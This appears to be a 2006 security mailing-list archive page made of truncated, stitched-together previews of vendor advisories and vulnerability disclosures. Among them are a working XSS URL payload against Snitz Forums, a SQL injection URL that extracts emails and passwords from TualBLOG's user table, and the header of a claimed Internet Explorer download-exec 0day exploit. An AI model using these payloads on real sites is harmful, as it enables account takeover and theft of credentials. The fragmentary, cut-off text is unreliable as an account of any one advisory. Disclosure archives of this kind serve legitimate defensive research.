-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1175-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
September 13th, 2006
# ForumJBC v4 = Cross-Site Scripting - XSS Exploit ;
# Discovered By : ThE__LeO ;
# Software : ForumJBC v4 ;
# Site Of SoftWare : http://jbc.unlimited.free.fr
# Version : 4 ;
# Exploit :
Multiple Cross Site Scripting Vulnerabilities were identified in
SoftComplex Inc.'s PHP Event Calendar, a reusable PHP script that
extends a web site's functionality with an event scheduler or news
archive.
http://www.softcomplex.com/products/php_event_calendar/
Attached is the advisory which
When does php.net usually publish an official patched version on their
website, outside of cvs? One would think they should publish it soon
considering the vulnerability and exploit.
On 9/9/06, İsmail Dönmez [EMAIL PROTECTED] wrote:
Hi,
On Saturday, 9 September 2006 at 13:24, [EMAIL PROTECTED]
NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities
.=[ Arif Jatmoko ]=.
Release Date : 8 July 2006
Product Affected :
- NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
possibly newer
- NetPerformer FRAD ACT SDM-93xx version
Hi,
[EMAIL PROTECTED] wrote on Sun, 10 Sep 2006 17:19:00 +:
+---
+ Affected Software .: Software
+ Version .: PHP Advanced Transfer Manager v1.20
+ Vendor ...: http://phpatm.free.fr/
+ Class
Panda is really great and really fast. The bug was also reported on 16.07.06 to
the beta team.
16.07.06
Hi there,
I think there are some badly set filesystem permissions in your software.
FileSecure 7.01.10
C:\Programme\Panda Software\AVNT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200609-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
McAfee, Inc.
McAfee Avert(tm) Labs Security Advisory
Public Release Date: 2006-09-12
Apple QuickTime Multiple Vulnerabilities
CVE-2006-4382, CVE-2006-4384, CVE-2006-4385, CVE-2006-4386,
CVE-2006-4388, CVE-2006-4389
_
* Synopsis
===
Ubuntu Security Notice USN-345-1 September 13, 2006
mailman vulnerabilities
CVE-2006-2941, CVE-2006-3636
===
A security issue affects the following Ubuntu releases:
Ubuntu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00768665
Version: 1
HPSBUX02151 SSRT051021 rev.1 - HP-UX Running ARPA Transport Software,
Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00767033
Version: 1
HPSBMA02149 SSRT050968 rev.1 - HP OpenView Operations,
Remote Unauthorized Access and Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1161-2 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 13th, 2006
Phenoelit Advisory wir-haben-auch-mal-was-gefunden #0815 +---+
[ Title ]
Cisco Systems IOS VTP multiple vulnerabilities
[ Authors ]
FX [EMAIL PROTECTED]
Phenoelit Group (http://www.phenoelit.de)
Advisory
/*
*---
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec
Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
ENGLISH
# Title : Snitz Forums 3.4.06 XSS Vulnerability
# Author : ajann
# HomePage : http://forum.snitz.com
# [CODE]
http://target.com/[path]/forum.asp?FORUM_ID=1ARCHIVE=truesortfield=lastpostsortorder=;scriptfunction%20xssbaslat(){alert(Xss%20Here);}/scriptbody%20onload=xssbaslat()
New eVuln Advisory:
Doika guestbook 'page' XSS Vulnerability
http://evuln.com/vulns/134/summary.html
Summary
eVuln ID: EV0134
CVE: CVE-2006-4325
Software: Doika guestbook
Software's Web Site: http://doika.net/
Versions: 2.5
Critical Level: Harmless
Type:
New eVuln Advisory:
Links Manager Multiple XSS and SQL Injection Vulnerabilities
http://evuln.com/vulns/136/summary.html
Summary
eVuln ID: EV0136
CVE: CVE-2006-4327 CVE-2006-4328
Vendor: CloudNine Interactive
Vendor's Web Site:
New eVuln Advisory:
CJ Tag Board XSS Vulnerability
http://evuln.com/vulns/137/summary.html
Summary
eVuln ID: EV0137
Vendor: CloudNine Interactive
Vendor's Web Site: http://www.cloudnineinteractive.co.uk/
Software: Tag Board
Software's Web Site:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200609-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
New eVuln Advisory:
NX5Linkx Multiple Vulnerabilities
http://evuln.com/vulns/138/summary.html
Summary
eVuln ID: EV0138
CVE: CVE-2006-4503 CVE-2006-4504 CVE-2006-4505
Vendor: NX5
Vendor's Web Site: http://nx5ware.nx5.org/
Software: NX5Linkx
Software's Web Site:
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ANNOUNCING
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1176-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
September 13th, 2006
.
An official response is located at:
http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml
These vulnerabilities are addressed by Cisco bug IDs:
* CSCsd52629/CSCsd34759 -- VTP version field DoS
* CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
* CSCsd34855/CSCei54611